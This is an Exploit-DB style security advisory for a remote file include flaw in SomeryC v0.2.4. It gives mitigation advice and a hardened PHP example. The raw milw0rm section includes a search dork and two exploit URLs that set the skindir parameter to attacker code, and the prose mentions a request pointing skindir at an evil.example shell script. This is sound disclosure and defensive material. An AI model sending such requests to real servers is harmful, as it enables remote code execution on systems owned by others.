Vendor: SomeryC
Author: Katatafish
CVSS: 7.5 (HIGH)
CWE: Remote File Include
Product Name: SomeryC
Affected Version From: SomeryC v0.2.4
Affected Version To: SomeryC v0.2.4
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

SomeryC <= v0.2.4 Remote File Include

/admin/system/include.php passes the variable $skindir straight into include("$skindir/header.php") and include("$skindir/footer.php") without initialising or validating it. With register_globals enabled, a request can set $skindir from the skindir query parameter: the footer include runs on every request, and the header include additionally runs when start is set. If the value is a URL pointing at an attacker-controlled host, PHP fetches the remote script and executes it under the web server's account, which is arbitrary code execution on the server.

Mitigation:

No vendor patch is listed. Fix the code rather than relying on server settings alone: initialise $skindir from configuration instead of request input, restrict any user-selectable skin name to a whitelist of known directory names, and verify that the resolved path stays under the skin directory. At the PHP level, turn off register_globals and allow_url_include (available since PHP 5.2), and allow_url_fopen if nothing else needs it. Note that disabling the URL wrappers only blocks the remote variant; the same uninitialised parameter can still be pointed at local files, so the code change is required either way.
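As an added example (not SomeryC's code), the following PHP shows the hardened form of the vulnerable include pattern: the skin name is taken explicitly from $_GET, restricted to a plain token by regex, resolved with realpath, and checked to lie under a fixed skin base directory before any include runs. SKIN_BASE, DEFAULT_SKIN, resolve_skin_dir and render are names assumed here for illustration; the skins directory layout is likewise assumed.

```php
<?php
// Added example, not SomeryC's own code. Hardened replacement for the
// include("$skindir/header.php") / include("$skindir/footer.php") pattern
// in /admin/system/include.php. SKIN_BASE and the directory layout are
// assumptions for this example.
declare(strict_types=1);

const SKIN_BASE    = __DIR__ . '/../../skins';   // assumed location of skin dirs
const DEFAULT_SKIN = 'default';                  // assumed fallback skin name

/**
 * Resolve a user-supplied skin name to a directory under SKIN_BASE.
 * Returns null for anything that is not a plain, existing subdirectory.
 */
function resolve_skin_dir(string $requested): ?string
{
    // Allow only a short alphanumeric token. This rejects "http://", "ftp://",
    // "php://", "../", slashes and null bytes in one step, so a remote URL or
    // a traversal path never reaches include().
    if (!preg_match('/^[A-Za-z0-9_-]{1,32}$/', $requested)) {
        return null;
    }

    $base = realpath(SKIN_BASE);
    $dir  = realpath(SKIN_BASE . '/' . $requested);
    if ($base === false || $dir === false || !is_dir($dir)) {
        return null;
    }

    // Belt and braces: realpath follows symlinks, so confirm the canonical
    // path is still inside the skin base before trusting it.
    if (strpos($dir, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $dir;
}

/**
 * Same control flow as the original include.php, but $skindir is now a
 * validated local path rather than whatever the request supplied.
 */
function render(bool $start, string $requestedSkin): void
{
    $skindir = resolve_skin_dir($requestedSkin) ?? resolve_skin_dir(DEFAULT_SKIN);
    if ($skindir === null) {
        http_response_code(500);
        exit('skin directory not configured');
    }

    if ($start) {
        include $skindir . '/header.php';
    }
    // ... page body ...
    include $skindir . '/footer.php';
}

// Read the parameters explicitly from $_GET with known types. The original
// relied on register_globals to populate $start and $skindir, which is what
// let a query string choose the include target.
$start = isset($_GET['start']) && $_GET['start'] === '1';
$skin  = (isset($_GET['skindir']) && is_string($_GET['skindir']))
       ? $_GET['skindir']
       : DEFAULT_SKIN;

render($start, $skin);
```

With this in place, a request such as include.php?skindir=http://evil.example/shell.txt? fails the regex and falls back to the default skin instead of fetching the remote script; a request naming a real skin directory still works. The realpath check matters even though the regex already excludes traversal, because it also catches a skin directory that has been replaced by a symlink pointing outside the base.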

Exploit-DB raw data:

### SomeryC <= v0.2.4 Remote File Include ###

#Vendor:        http://someryc.mostpopularcomic.com
#download       http://someryc.mostpopularcomic.com/sC024.zip

#found by: Katatafish (karatatata@hush.com)

#d0rk: "powered by someryc"

#vuln-code(/admin/system/include.php):

if ($start) {
....
       include("$skindir/header.php");
}
....
       include("$skindir/footer.php");

#exploit:

http://www.site.com/admin/system/include.php?skindir=[evilCode]
http://www.site.com/admin/system/include.php?start=1&skindir=[evilCode]

# milw0rm.com [2007-08-27]